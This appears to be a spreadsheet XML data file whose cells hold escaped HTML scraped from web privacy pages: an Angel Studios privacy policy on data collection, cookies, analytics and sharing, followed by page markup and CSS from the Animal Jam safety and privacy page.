    <t>class="mt-4"&gt;Any other information that a browser or device automatically sends whenever connected to a website or an online application; and&lt;/li&gt;&lt;li class="mt-4"&gt;Data from activity that is publicly visible and/or accessible on blockchains, including but not limited to, blockchain addresses and information regarding purchases, sales, or transfers of NFTs, which may then be associated with other data you have provided to us.&lt;/li&gt;&lt;/ol&gt;&lt;/li&gt;&lt;/ol&gt;&lt;/li&gt;&lt;li class="mt-4"&gt;&lt;span class="font-semibold"&gt;HOW WE COLLECT PERSONAL DATA&lt;/span&gt;&lt;p class="mt-4"&gt;A large portion of the Personal Data we, or third parties acting on our behalf, collect is directly from you and other users who provide their Personal Data to us directly. In some cases, we may collect Personal Data from third parties in the ways described in this Policy.&lt;/p&gt;&lt;ol class="list-[lower-roman] list-inside ml-4"&gt;&lt;li class="mt-4"&gt;&lt;span class="font-semibold"&gt;Directly from You&lt;/span&gt; When you access, use or otherwise interact with our Platform, or otherwise engage with us in connection with our Platform, such as requesting more information about us, communicating with us, accessing, using or otherwise interacting with our Platform, we may ask you to provide certain Personal Data. Some of the Personal Data we request with respect to certain features of our Platform may not be required; however, we will let you know if specific Personal Data is required to use those features.</t>
  </si>
  <si>
    <t>If you do not provide us with the Personal Data required to use a certain feature on our Platform, you will not be able to use that feature, especially those features where we are legally required to collect the Personal Data and those where it is impossible for the feature to operate without the required Personal Data (e.g., collecting your payment information in order to process an order you place in the Angel store).&lt;/li&gt;&lt;li class="mt-4"&gt;&lt;span class="font-semibold"&gt;From Third Parties&lt;/span&gt; We, or third parties acting on our behalf, may collect Personal Data about you from third parties, including, without limitation, online and offline sources, entities affiliated with us, our service providers, social media platforms, advertising networks and other public or commercial sources (collectively, “Third Party Sources”). The collection of Personal Data from these Third Party Sources can occur in a variety of ways, including, without limitation:&lt;ol class="list-[lower-alpha] list-inside ml-4"&gt;&lt;li class="mt-4"&gt;By sharing our content via Third Party Sites or accessing, using or interacting with our Platform through Third Party Sites, you acknowledge that we may collect, share, store and use any Personal Data we receive from those Third Party Sites about you.</t>
  </si>
  <si>
    <t>In some cases, you may be able to revoke our access to your Personal Data and other content and information we receive from Third Party Sites by changing the appropriate settings for your account with the applicable Third Party Site.&lt;/li&gt;&lt;li class="mt-4"&gt;Some of the features of our Platform may provide you with the ability to register and sign into our Platform through the accounts you have with certain third parties, such as Facebook, Google, or Apple (“Third Party Single Sign On Providers”). When you use these features, we, or third parties acting on our behalf, gather the data necessary to create an account on our Platform from the applicable Third Party Single Sign On Provider, which may include, without limitation, your name, email address, IP address, device model, device operating system and web browser, time zone, carrier, screen size, processor cores, total disk space and remaining disk space. Your data associated with the applicable Third Party Single Sign On Provider will not be sold, redisclosed or edited through this process.</t>
  </si>
  <si>
    <t>Your ability to use this option may be limited where the applicable Third Party Single Sign On Provider requires you to use a device or operating system that meets that Third Party Single Sign On Provider’s requirements.</t>
  </si>
  <si>
    <t>Please note, by using these features, the applicable Third Party Single Sign On Provider will know that you are signing into our Platform and that you are a user of our Platform.&lt;/li&gt;&lt;li class="mt-4"&gt;We, or third parties acting on our behalf, may receive Personal Data about you from third parties that provide services to us through or in connection with the operation of our Platform and our Operations (“Operational Service Providers”). Operational Service Providers may include, without limitation, hosting providers and payment providers.&lt;/li&gt;&lt;li class="mt-4"&gt;We, or third parties acting on our behalf, may receive Personal Data about you from our Affiliates. This Personal Data may include, without limitation, information related to your access, use or interaction with our Affiliates and/or the services, products and other things they provide.&lt;/li&gt;&lt;li class="mt-4"&gt;We, or third parties acting on our behalf, may also receive Personal Data about you from other third parties, such as other users of our Platform and those that refer you to our Platform.&lt;/li&gt;&lt;li class="mt-4"&gt;We may receive Personal Data about you from companies that offer their products and/or services for use in conjunction with our Platforms or whose products and/or services may be linked from our Platforms.</t>
  </si>
  <si>
    <t>For example, third-party wallet providers provide us with your blockchain address and certain other information you choose to share with those wallet providers. We may add this to the data we have already collected from or about you through our Platform.&lt;/li&gt;&lt;/ol&gt;&lt;p class="mt-4"&gt;Please note, we may combine the Personal Data and other content and information we receive about you from multiple sources, including, without limitation, Personal Data we collect directly from you and one or more Third Party Sources.&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;/li&gt;&lt;li class="mt-4"&gt;&lt;span class="font-semibold"&gt;HOW WE COLLECT USAGE DATA&lt;/span&gt;&lt;p class="mt-4"&gt;We, and third parties acting on our behalf, collect Usage Data in a variety of ways. Some Usage Data, such as the IP address of a device attempting to access, use or interact with our Platform, is necessary for us to make certain portions of our Platform available.</t>
  </si>
  <si>
    <t>Other Usage Data, such as information about which features of our Platform are popular, helps us improve and advertise our Platform. This section describes the primary ways Usage Data is collected in connection with our Platform.&lt;/p&gt;&lt;ol class="list-[lower-roman] list-inside ml-4"&gt;&lt;li class="mt-4"&gt;The systems we use to make our Platform available to you.</t>
  </si>
  <si>
    <t>When you access, use or interact with our Platform, these systems automatically record certain information that your browser or device sends whenever you visit a website or utilize an online application, such as information about how long your device is connected to our Platform and the activities that device engages in while connected.&lt;/li&gt;&lt;li class="mt-4"&gt;Cookies, which are small data files that are uploaded to the hard drive or other storage location of devices that access, use or interact with our Platform. Among other things, cookies help us improve our Platform and our users’ experience. We use cookies to see which areas and features are popular and to understand usage of our Platform.</t>
  </si>
  <si>
    <t>We use first party cookies, served directly by us to the devices that access our Platform, to recognize devices when the revisit our Platform. We also use third party cookies, which are cookies that are placed by other parties we work with. These parties may upload unique cookies to your device to collect information about your use of our Platform and potentially other online activities you engage in over time across different websites and other online applications.</t>
  </si>
  <si>
    <t>The Options/Settings section of most internet browsers will tell you how to manage cookies and other technologies that may be uploaded to your device, including how to disable such technologies. You can &lt;span class="underline cursor-pointer"&gt;Manage Cookie Preferences&lt;/span&gt; here, or you can disable our cookies, or all cookies, through your browser settings, but please note, disabling cookies may impact some of the features of our Platform and prevent them from operating as intended. You can learn more about cookies, including how to see what cookies have been uploaded to your device and how to manage and delete them, by visiting&lt;!-- --&gt; &lt;a href="https://www.allaboutcookies.org/" target="_blank" rel="external noopener noreferrer" data-cy="all-about-cookies-link" class="underline"&gt;https://www.allaboutcookies.org/&lt;/a&gt;.&lt;/li&gt;&lt;li class="mt-4"&gt;Other tracking technologies, such as web beacons, clear gifs, and pixel tags.</t>
  </si>
  <si>
    <t>These technologies may be used on or in connection with our Platform, including, without limitation, in emails we send. We may use these technologies to deliver cookies, count visits, understand usage and observe data on email delivery, open rates, click rates, bounces, unsubscribes and other information.&lt;/li&gt;&lt;li class="mt-4"&gt;Third party analytic tools, such as:&lt;ol class="list-[lower-alpha] list-inside ml-4"&gt;&lt;li class="mt-4"&gt;Google Analytics, a web analytics tool that assists us in understanding how our Platform is used. Google Analytics will place cookies on your device that will generate information we select about your use of our Platform, including your device’s IP address.</t>
  </si>
  <si>
    <t>That information will be transmitted directly to and stored by Google. The information will be used for the purposes of evaluating use of our Platform, compiling reports on activity on our Platform for our use and providing other services relating to activity on, and usage of, our Platform. Google may also transfer this information to third parties where required to do so by law, or where such third parties process the information on Google’s behalf.</t>
  </si>
  <si>
    <t>You may refuse the use of cookies by selecting the appropriate settings on your browser. Please note that by doing so, you may not be able to use the full functionality of our Platform. Google’s practices with respect to the Personal Data collected through Google Analytics is covered by Google’s privacy policy, available at&lt;!-- --&gt; &lt;a href="https://policies.google.com/privacy" target="_blank" rel="external noopener noreferrer" data-cy="google-privacy-link" class="underline"&gt;https://policies.google.com/privacy&lt;/a&gt;.</t>
  </si>
  <si>
    <t>Google allows you to opt out of Google Analytics. You may opt-out by visiting&lt;!-- --&gt; &lt;a href="https://tools.google.com/dlpage/gaoptout" target="_blank" rel="external noopener noreferrer" data-cy="google-ads-link" class="underline"&gt;https://tools.google.com/dlpage/gaoptout&lt;/a&gt;.&lt;/li&gt;&lt;li class="mt-4"&gt;Facebook Pixel, a tool that allows us to measure the effectiveness of our Facebook advertising campaigns, uses a cookie placed by Facebook. The information collected by that cookie will be transmitted to and stored by Facebook.</t>
  </si>
  <si>
    <t>For more information about Facebook’s privacy practices, please refer to&lt;!-- --&gt; &lt;a href="https://www.facebook.com/about/privacy/" target="_blank" rel="external noopener noreferrer" data-cy="facebook-privacy-link" class="underline"&gt;https://www.facebook.com/about/privacy/&lt;/a&gt;. To opt-out, please see&lt;!-- --&gt; &lt;a href="https://www.facebook.com/ads/preferences" target="_blank" rel="external noopener noreferrer" data-cy="facebook-ads-link" class="underline"&gt;https://www.facebook.com/ads/preferences&lt;/a&gt;.&lt;/li&gt;&lt;/ol&gt;&lt;p class="mt-4"&gt;Please note, we have not yet developed a response to browser “Do Not Track” signals and do not change any of our data collection practices when we receive such signals. We will continue to evaluate potential responses to “Do Not Track” signals in light of industry developments or legal changes.&lt;/p&gt;&lt;/li&gt;&lt;li class="mt-4"&gt;Third-Party Wallets.</t>
  </si>
  <si>
    <t>To use our Platform, you must use a third-party wallet which allows you to engage in transactions on public blockchains. Your interactions with any third-party wallet provider are governed by the applicable terms of service and privacy policy of that third party.&lt;/li&gt;&lt;/ol&gt;&lt;/li&gt;&lt;li class="mt-4"&gt;&lt;span class="font-semibold"&gt;HOW WE USE PERSONAL DATA&lt;/span&gt;&lt;p class="mt-4"&gt;We use Personal Data for various purposes to operate and improve our Platform and to conduct our Operations.</t>
  </si>
  <si>
    <t>The primary purposes for which we use Personal Data are:&lt;/p&gt;&lt;ol class="list-[lower-roman] list-inside ml-4"&gt;&lt;li class="mt-4"&gt;Marketing Purposes – we may, either on our own or jointly with our third party marketing partners (“Marketing Partners”), use the Personal Data we, or third parties acting on our behalf, collect for marketing purposes, including notifying you of special promotions, opportunities, offers and events via push notifications, e-mail and other means, all subject to our compliance with applicable laws (“Marketing Purposes”). We may also link Personal Data (including your name, mobile phone number, and email address) with other information (including information we automatically collect as described in this Policy) and use such linked information for Marketing Purposes. Our Marketing Purposes may include using Personal Data collected through cookies and other tracking technologies to facilitate the delivery of targeted ads, promotions, and offers to you, on behalf of ourselves and our Marketing Partners on and off our Platform.</t>
  </si>
  <si>
    <t>If you do not want us to use your Personal Data for marketing purposes, you may opt-out in accordance with the “Managing Your Personal Data” section below.&lt;/li&gt;&lt;li class="mt-4"&gt;Non-Marketing Purposes – we may use the Personal Data we, or third parties acting on our behalf, collect for non-marketing purposes, including: (1) operating and improving our Platform; (2) validating your identity; (3) carrying out our obligations and enforcing our rights arising from any contracts we have entered into, including, without limitation, any contracts between you and us; (4) sending you emails to provide you with alerts and updates about your engagement with our Platform; (5) conducting statistical or demographic analysis; (6) complying with legal and regulatory requirements; (7) customizing your experience with our Platform; (8) protecting and defending Angel Studios against legal actions or claims; (9) preventing fraud; (10) satisfying contractual obligations; (11) cooperating with law enforcement or other governmental agencies for purposes of investigations, national security, public safety or matters of public importance when we are legally required to do so or believe that disclosure of Personal Data is necessary or appropriate to protect the public interest; (12) those you authorize or instruct us to do; and (13) other business purposes permitted under applicable law.&lt;/li&gt;&lt;/ol&gt;&lt;p class="mt-4"&gt;We will not collect additional categories of Personal Data or use the Personal Data we, or third parties acting on our behalf, collect in connection with our Platform for materially different, unrelated or incompatible purposes without providing you notice.&lt;/p&gt;&lt;p class="mt-4"&gt;Please note, we may use and disclose aggregated, anonymized or de-identified information collected in connection with our Platform and other information that does not identify any individual (“Anonymized Data”) for any lawful purposes, which may include, without limitation, purposes not described in this Policy. Except as otherwise required under applicable laws, our use and disclosure of such Anonymized Data is not subject to this Policy.&lt;/p&gt;&lt;/li&gt;&lt;li class="mt-4"&gt;&lt;span class="font-semibold"&gt;SHARING PERSONAL DATA WITH THIRD PARTIES&lt;/span&gt;&lt;p class="mt-4"&gt;To operate our Platform and conduct Operations, we may share certain Personal Data that we, or third parties acting on our behalf, have collected, with certain third parties.</t>
  </si>
  <si>
    <t>The third parties that we may share Personal Data with include:&lt;/p&gt;&lt;ol class="list-[lower-roman] list-inside ml-4"&gt;&lt;li class="mt-4"&gt;Our Operational Service Providers in connection with the services they provide to us, including, without limitation, order fulfillment, marketing, data hosting, payment processing and fraud protection and prevention. We require these Operational Service Providers to exercise reasonable care to protect your Personal Data and restrict their use of your Personal Data to the purposes for which we provided to them.&lt;/li&gt;&lt;li class="mt-4"&gt;Our Affiliates for purposes related to: (1) our Operations, including, without limitation, to operate our Platform, to process, fulfill or administer orders you place through our Platform and to market or promote our Platform; and (2) their business operations, including, without limitation, marketing and promoting the services they provide. Each Affiliate’s use of your Personal Data is subject to that Affiliate’s privacy policy.</t>
  </si>
  <si>
    <t>In the event a particular Affiliate does not have a privacy policy, unless we inform you otherwise, that Affiliate’s use of your Personal Data will be in accordance with this Policy.&lt;/li&gt;&lt;li class="mt-4"&gt;Our Marketing Partners to facilitate the delivery of targeted ads, promotions and offers to you, on behalf of ourselves and our Marketing Partners, on and off our Platform.&lt;/li&gt;&lt;li class="mt-4"&gt;In the event of a merger, acquisition, bankruptcy or other sale of all or a portion of our assets,</t>
  </si>
  <si>
    <t>css2?family=Montserrat:wght@100;300;400;600;700&amp;display=swap" rel="stylesheet"&gt;_x005F_x000D_
   &lt;link rel="stylesheet" href="https://tutotoons.com/assets/scss/cookieconsent.css?v=1681340070"&gt;_x005F_x000D_
   &lt;link rel="stylesheet" href="https://tutotoons.com/assets/scss/master.min.css?v=1681340070"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</si>
  <si>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html&gt;&lt;html lang="en"&gt;&lt;head&gt;
    &lt;meta charset="utf-8"&gt;
    &lt;meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"&gt;
    &lt;meta http-equiv="X-UA-Compatible" content="IE=edge"&gt;
    &lt;meta name="google-site-verification" content="u15Zk7esctJIeBq3gJICd7pQMiq63pnf_q6M2mvQtLE"&gt;
    &lt;meta name="theme-color" content="#21A392"&gt;
    &lt;meta name="msapplication-TileColor" content="#5AC9A8"&gt;
    &lt;title&gt;Safety &amp;amp; Privacy | Animal Jam Is a Safe Online Game For Kids&lt;/title&gt;
    &lt;base href="/"&gt;
    &lt;meta name="description" content="We work hard to make Animal Jam a private and safe online game. We protect your information in compliance with COPPA and we work to keep your kids safe online. "&gt;
    &lt;meta name="keywords" content="Animal Jam is an award-winning online animal game for kids.</t>
  </si>
  <si>
    <t>Play educational animal games in a safe &amp;amp; fun online playground. "&gt;
    &lt;meta name="twitter:site_name" content="Animal Jam"&gt;
		&lt;meta name="twitter:site" content="@AnimalJam"&gt;
		&lt;meta name="twitter:card" content="summary_large_image"&gt;
		&lt;meta name="twitter:title" content="Get Animal Jam for your mobile device, PC, or Mac"&gt;
		&lt;meta name="twitter:description" content="We work hard to make Animal Jam a private and safe online game. We protect your information in compliance with COPPA and we work to keep your kids safe online.</t>
  </si>
  <si>
    <t>"&gt;
		&lt;meta name="twitter:image" content="https://ajwebcdn1.akamaized.net/assets/2.0/social_share/animal_jam_hero_twitter-3462971e96799562ed47a302d52486732fe85cc387b4d519aaba83bb1ec45c54.jpg"&gt;
    &lt;meta property="og:type" content="website"&gt;
		&lt;meta property="og:url" content="https://dev.animaljam.com/en/privacy"&gt;
		&lt;meta property="og:site_name" content="Animal Jam"&gt;
		&lt;meta property="og:title" content="Animal Jam's Game Safety &amp;amp; Privacy"&gt;
		&lt;meta property="og:description" content="Animal Jam is an award-winning online animal game for kids. Play educational animal games in a safe &amp;amp; fun online playground. "&gt;
		&lt;meta property="og:image" content="https://ajwebcdn1.akamaized.net/assets/2.0/social_share/animal_jam_hero-79c234e855acd45bdb2cbca3138c6797ce200b009250f1ccb2bff0d5e665d3a1.jpg"&gt;
    &lt;!-- favicons --&gt;
    &lt;link rel="icon" type="image/x-icon" href="https://animaljam.com/assets/shared/favicon-16x16-b540522e87.png"&gt;
    &lt;link rel="icon" type="image/x-icon" href="https://animaljam.com/assets/shared/favicon-32x32-1aa7c1d381.png"&gt;
    &lt;link rel="icon" type="image/x-icon" href="https://animaljam.com/assets/shared/favicon-96x96-a7d6b5c0a8.png"&gt;
    &lt;!--</t>
  </si>
  <si>
    <t>Android --&gt;
    &lt;link rel="icon" type="image/png" sizes="192x192" href="https://animaljam.com/assets/shared/android-icon-192x192-17d88bb261.png"&gt;
    &lt;link rel="manifest" href="https://animaljam.com/assets/manifest-3326fcfa05.json"&gt;
    &lt;!-- Apple --&gt;
    &lt;link rel="apple-touch-icon" sizes="57x57" href="https://animaljam.com/assets/shared/apple-icon-57x57-8b7ddd1ec0.png"&gt;
    &lt;link rel="apple-touch-icon" sizes="60x60" href="https://animaljam.com/assets/shared/apple-icon-60x60-a3ecfeb2dd.png"&gt;
    &lt;link rel="apple-touch-icon" sizes="72x72" href="https://animaljam.com/assets/shared/apple-icon-72x72-37ae0c8ac8.png"&gt;
    &lt;link rel="apple-touch-icon" sizes="76x76" href="https://animaljam.com/assets/shared/apple-icon-76x76-e1a7829b3b.png"&gt;
    &lt;link rel="apple-touch-icon" sizes="114x114" href="https://animaljam.com/assets/shared/apple-icon-114x114-7bd968a32f.png"&gt;
    &lt;link rel="apple-touch-icon" sizes="120x120" href="https://animaljam.com/assets/shared/apple-icon-120x120-f08978664c.png"&gt;
    &lt;link rel="apple-touch-icon" sizes="144x144" href="https://animaljam.com/assets/shared/apple-icon-144x144-5e7b614602.png"&gt;
    &lt;link rel="apple-touch-icon" sizes="152x152" href="https://animaljam.com/assets/shared/apple-icon-152x152-7aaf085d46.png"&gt;
    &lt;link rel="apple-touch-icon" sizes="180x180" href="https://animaljam.com/assets/shared/apple-icon-180x180-26cbcda509.png"&gt;
    &lt;!-- Microsoft --&gt;
    &lt;meta name="msapplication-TileImage" content="https://animaljam.com/assets/shared/ms-icon-144x144.png"&gt;
    &lt;meta name="msapplication-square70x70logo" content="https://animaljam.com/assets/favicon/mstile-70x70.png"&gt;
    &lt;meta name="msapplication-square150x150logo" content="https://animaljam.com/assets/shared/mstile-150x150-1c7dc50b9f.png"&gt;
    &lt;meta name="msapplication-wide310x150logo" content="https://animaljam.com/assets/shared/mstile-310x150-8b141c0697.png"&gt;
    &lt;meta name="msapplication-square310x310logo" content="https://animaljam.com/assets/shared/mstile-310x310-893add6508.png"&gt;
    &lt;meta name="msapplication-config" content="https://animaljam.com/assets/shared/browserconfig-dc01c3b481.xml"&gt;
  &lt;link rel="stylesheet" href="https://ajwebcdn1.akamaized.net/welcome/styles-03cf630c28.css"&gt;&lt;style ng-transition="AjAngularApp"&gt;&lt;/style&gt;&lt;style ng-transition="AjAngularApp"&gt;.mat-badge-content[_ngcontent-sc19]{font-weight:600;font-size:12px;font-family:Roboto,"Helvetica Neue",sans-serif}.mat-badge-small[_ngcontent-sc19]   .mat-badge-content[_ngcontent-sc19]{font-size:9px}.mat-badge-large[_ngcontent-sc19]   .mat-badge-content[_ngcontent-sc19]{font-size:24px}.mat-h1[_ngcontent-sc19], .mat-headline[_ngcontent-sc19], .mat-typography[_ngcontent-sc19]   h1[_ngcontent-sc19]{font:400 24px/32px Roboto,"Helvetica Neue",sans-serif;margin:0 0 16px}.mat-h2[_ngcontent-sc19], .mat-title[_ngcontent-sc19], .mat-typography[_ngcontent-sc19]   h2[_ngcontent-sc19]{font:500 20px/32px Roboto,"Helvetica Neue",sans-serif;margin:0 0 16px}.mat-h3[_ngcontent-sc19], .mat-subheading-2[_ngcontent-sc19], .mat-typography[_ngcontent-sc19]   h3[_ngcontent-sc19]{font:400 16px/28px Roboto,"Helvetica Neue",sans-serif;margin:0 0 16px}.mat-h4[_ngcontent-sc19], .mat-subheading-1[_ngcontent-sc19], .mat-typography[_ngcontent-sc19]   h4[_ngcontent-sc19]{font:400 15px/24px Roboto,"Helvetica Neue",sans-serif;margin:0 0 16px}.mat-h5[_ngcontent-sc19], .mat-typography[_ngcontent-sc19]   h5[_ngcontent-sc19]{font:400 calc(14px * .83)/20px Roboto,"Helvetica Neue",sans-serif;margin:0 0 12px}.mat-h6[_ngcontent-sc19], .mat-typography[_ngcontent-sc19]   h6[_ngcontent-sc19]{font:400 calc(14px * .67)/20px Roboto,"Helvetica Neue",sans-serif;margin:0 0 12px}.mat-body-2[_ngcontent-sc19], .mat-body-strong[_ngcontent-sc19]{font:500 14px/24px Roboto,"Helvetica Neue",sans-serif}.mat-body[_ngcontent-sc19], .mat-body-1[_ngcontent-sc19], .mat-typography[_ngcontent-sc19]{font:400 14px/20px Roboto,"Helvetica Neue",sans-serif}.mat-body[_ngcontent-sc19]   p[_ngcontent-sc19], .mat-body-1[_ngcontent-sc19]   p[_ngcontent-sc19], .mat-typography[_ngcontent-sc19]   p[_ngcontent-sc19]{margin:0 0</t>
  </si>
  <si>
    <t>12px}.mat-caption[_ngcontent-sc19], .mat-small[_ngcontent-sc19]{font:400 12px/20px Roboto,"Helvetica Neue",sans-serif}.mat-display-4[_ngcontent-sc19], .mat-typography[_ngcontent-sc19]   .mat-display-4[_ngcontent-sc19]{font:300 112px/112px Roboto,"Helvetica Neue",sans-serif;letter-spacing:-.05em;margin:0 0 56px}.mat-display-3[_ngcontent-sc19], .mat-typography[_ngcontent-sc19]   .mat-display-3[_ngcontent-sc19]{font:400 56px/56px Roboto,"Helvetica Neue",sans-serif;letter-spacing:-.02em;margin:0 0 64px}.mat-display-2[_ngcontent-sc19], .mat-typography[_ngcontent-sc19]   .mat-display-2[_ngcontent-sc19]{font:400 45px/48px Roboto,"Helvetica Neue",sans-serif;letter-spacing:-.005em;margin:0 0 64px}.mat-display-1[_ngcontent-sc19], .mat-typography[_ngcontent-sc19]   .mat-display-1[_ngcontent-sc19]{font:400 34px/40px Roboto,"Helvetica Neue",sans-serif;margin:0 0 64px}.mat-bottom-sheet-container[_ngcontent-sc19]{font:400 14px/20px Roboto,"Helvetica Neue",sans-serif}.mat-button[_ngcontent-sc19], .mat-fab[_ngcontent-sc19], .mat-flat-button[_ngcontent-sc19], .mat-icon-button[_ngcontent-sc19], .mat-mini-fab[_ngcontent-sc19], .mat-raised-button[_ngcontent-sc19], .mat-stroked-button[_ngcontent-sc19]{font-family:Roboto,"Helvetica Neue",sans-serif;font-size:14px;font-weight:500}.mat-button-toggle[_ngcontent-sc19], .mat-card[_ngcontent-sc19]{font-family:Roboto,"Helvetica Neue",sans-serif}.mat-card-title[_ngcontent-sc19]{font-size:24px;font-weight:500}.mat-card-header[_ngcontent-sc19]   .mat-card-title[_ngcontent-sc19]{font-size:20px}.mat-card-content[_ngcontent-sc19], .mat-card-subtitle[_ngcontent-sc19]{font-size:14px}.mat-checkbox[_ngcontent-sc19]{font-family:Roboto,"Helvetica Neue",sans-serif}.mat-checkbox-layout[_ngcontent-sc19]   .mat-checkbox-label[_ngcontent-sc19]{line-height:24px}.mat-chip[_ngcontent-sc19]{font-size:14px;font-weight:500}.mat-chip[_ngcontent-sc19]   .mat-chip-remove.mat-icon[_ngcontent-sc19], .mat-chip[_ngcontent-sc19]   .mat-chip-trailing-icon.mat-icon[_ngcontent-sc19]{font-size:18px}.mat-table[_ngcontent-sc19]{font-family:Roboto,"Helvetica Neue",sans-serif}.mat-header-cell[_ngcontent-sc19]{font-size:12px;font-weight:500}.mat-cell[_ngcontent-sc19], .mat-footer-cell[_ngcontent-sc19]{font-size:14px}.mat-calendar[_ngcontent-sc19]{font-family:Roboto,"Helvetica Neue",sans-serif}.mat-calendar-body[_ngcontent-sc19]{font-size:13px}.mat-calendar-body-label[_ngcontent-sc19], .mat-calendar-period-button[_ngcontent-sc19]{font-size:14px;font-weight:500}.mat-calendar-table-header[_ngcontent-sc19]   th[_ngcontent-sc19]{font-size:11px;font-weight:400}.mat-dialog-title[_ngcontent-sc19]{font:500 20px/32px Roboto,"Helvetica Neue",sans-serif}.mat-expansion-panel-header[_ngcontent-sc19]{font-family:Roboto,"Helvetica Neue",sans-serif;font-size:15px;font-weight:400}.mat-expansion-panel-content[_ngcontent-sc19]{font:400 14px/20px Roboto,"Helvetica Neue",sans-serif}.mat-form-field[_ngcontent-sc19]{font-size:inherit;font-weight:400;line-height:1.125;font-family:Roboto,"Helvetica Neue",sans-serif}.mat-form-field-wrapper[_ngcontent-sc19]{padding-bottom:1.34375em}.mat-form-field-prefix[_ngcontent-sc19]   .mat-icon[_ngcontent-sc19], .mat-form-field-suffix[_ngcontent-sc19]   .mat-icon[_ngcontent-sc19]{font-size:150%;line-height:1.125}.mat-form-field-prefix[_ngcontent-sc19]   .mat-icon-button[_ngcontent-sc19], .mat-form-field-suffix[_ngcontent-sc19]   .mat-icon-button[_ngcontent-sc19]{height:1.5em;width:1.5em}.mat-form-field-prefix[_ngcontent-sc19]   .mat-icon-button[_ngcontent-sc19]   .mat-icon[_ngcontent-sc19], .mat-form-field-suffix[_ngcontent-sc19]   .mat-icon-button[_ngcontent-sc19]   .mat-icon[_ngcontent-sc19]{height:1.125em;line-height:1.125}.mat-form-field-infix[_ngcontent-sc19]{padding:.5em 0;border-top:.84375em solid transparent}.mat-form-field-can-float[_ngcontent-sc19]   .mat-input-server[_ngcontent-sc19]:focus + .mat-form-field-label-wrapper[_ngcontent-sc19]   .mat-form-field-label[_ngcontent-sc19], .mat-form-field-can-float.mat-form-field-should-float[_ngcontent-sc19]   .mat-form-field-label[_ngcontent-sc19]{-ms-transform:translateY(-1.34375em) scale(.75);transform:translateY(-1.34375em) scale(.75);width:133.33333%}.mat-form-field-can-float[_ngcontent-sc19]   .mat-input-server[label][_ngcontent-sc19]:not(:label-shown) + .mat-form-field-label-wrapper[_ngcontent-sc19]   .mat-form-field-label[_ngcontent-sc19]{-ms-transform:translateY(-1.34374em) scale(.75);transform:translateY(-1.34374em) scale(.75);width:133.33334%}.mat-form-field-label-wrapper[_ngcontent-sc19]{top:-.84375em;padding-top:.84375em}.mat-form-field-label[_ngcontent-sc19]{top:1.34375em}.mat-form-field-underline[_ngcontent-sc19]{bottom:1.34375em}.mat-form-field-subscript-wrapper[_ngcontent-sc19]{font-size:75%;margin-top:.66667em;top:calc(100% - 1.79167em)}.mat-form-field-appearance-legacy[_ngcontent-sc19]   .mat-form-field-wrapper[_ngcontent-sc19]{padding-bottom:1.25em}.mat-form-field-appearance-legacy[_ngcontent-sc19]   .mat-form-field-infix[_ngcontent-sc19]{padding:.4375em 0}.mat-form-field-appearance-legacy.mat-form-field-can-float[_ngcontent-sc19]   .mat-input-server[_ngcontent-sc19]:focus + .mat-form-field-label-wrapper[_ngcontent-sc19]   .mat-form-field-label[_ngcontent-sc19], .mat-form-field-appearance-legacy.mat-form-field-can-float.mat-form-field-should-float[_ngcontent-sc19]   .mat-form-field-label[_ngcontent-sc19]{transform:translateY(-1.28125em) scale(.75) perspective(100px) translateZ(.001px);-ms-transform:translateY(-1.28125em) scale(.75);width:133.33333%}.mat-form-field-appearance-legacy.mat-form-field-can-float[_ngcontent-sc19]   .mat-form-field-autofill-control[_ngcontent-sc19]:-webkit-autofill + .mat-form-field-label-wrapper[_ngcontent-sc19]   .mat-form-field-label[_ngcontent-sc19]{transform:translateY(-1.28125em) scale(.75) perspective(100px) translateZ(.00101px);-ms-transform:translateY(-1.28124em) scale(.75);width:133.33334%}.mat-form-field-appearance-legacy.mat-form-field-can-float[_ngcontent-sc19]   .mat-input-server[label][_ngcontent-sc19]:not(:label-shown) + .mat-form-field-label-wrapper[_ngcontent-sc19]   .mat-form-field-label[_ngcontent-sc19]{transform:translateY(-1.28125em) scale(.75) perspective(100px) translateZ(.00102px);-ms-transform:translateY(-1.28123em) scale(.75);width:133.33335%}.mat-form-field-appearance-legacy[_ngcontent-sc19]   .mat-form-field-label[_ngcontent-sc19]{top:1.28125em}.mat-form-field-appearance-legacy[_ngcontent-sc19]   .mat-form-field-subscript-wrapper[_ngcontent-sc19]{margin-top:.54167em;top:calc(100% - 1.66667em)}@media print{.mat-form-field-appearance-legacy.mat-form-field-can-float[_ngcontent-sc19]   .mat-input-server[_ngcontent-sc19]:focus + .mat-form-field-label-wrapper[_ngcontent-sc19]   .mat-form-field-label[_ngcontent-sc19], .mat-form-field-appearance-legacy.mat-form-field-can-float.mat-form-field-should-float[_ngcontent-sc19]   .mat-form-field-label[_ngcontent-sc19]{-ms-transform:translateY(-1.28122em) scale(.75);transform:translateY(-1.28122em) scale(.75)}.mat-form-field-appearance-legacy.mat-form-field-can-float[_ngcontent-sc19]   .mat-form-field-autofill-control[_ngcontent-sc19]:-webkit-autofill + .mat-form-field-label-wrapper[_ngcontent-sc19]   .mat-form-field-label[_ngcontent-sc19]{transform:translateY(-1.28121em) scale(.75)}.mat-form-field-appearance-legacy.mat-form-field-can-float[_ngcontent-sc19]   .mat-input-server[label][_ngcontent-sc19]:not(:label-shown)</t>
  </si>
  <si>
    <t>+ .mat-form-field-label-wrapper[_ngcontent-sc19]   .mat-form-field-label[_ngcontent-sc19]{-ms-transform:translateY(-1.2812em) scale(.75);transform:translateY(-1.2812em) scale(.75)}}.mat-form-field-appearance-fill[_ngcontent-sc19]   .mat-form-field-infix[_ngcontent-sc19]{padding:.25em 0 .75em}.mat-form-field-appearance-fill[_ngcontent-sc19]   .mat-form-field-label[_ngcontent-sc19]{top:1.09375em;margin-top:-.5em}.mat-form-field-appearance-fill.mat-form-field-can-float[_ngcontent-sc19]   .mat-input-server[_ngcontent-sc19]:focus + .mat-form-field-label-wrapper[_ngcontent-sc19]   .mat-form-field-label[_ngcontent-sc19], .mat-form-field-appearance-fill.mat-form-field-can-float.mat-form-field-should-float[_ngcontent-sc19]   .mat-form-field-label[_ngcontent-sc19]{-ms-transform:translateY(-.59375em) scale(.75);transform:translateY(-.59375em) scale(.75);width:133.33333%}.mat-form-field-appearance-fill.mat-form-field-can-float[_ngcontent-sc19]   .mat-input-server[label][_ngcontent-sc19]:not(:label-shown) + .mat-form-field-label-wrapper[_ngcontent-sc19]   .mat-form-field-label[_ngcontent-sc19]{-ms-transform:translateY(-.59374em) scale(.75);transform:translateY(-.59374em) scale(.75);width:133.33334%}.mat-form-field-appearance-outline[_ngcontent-sc19]   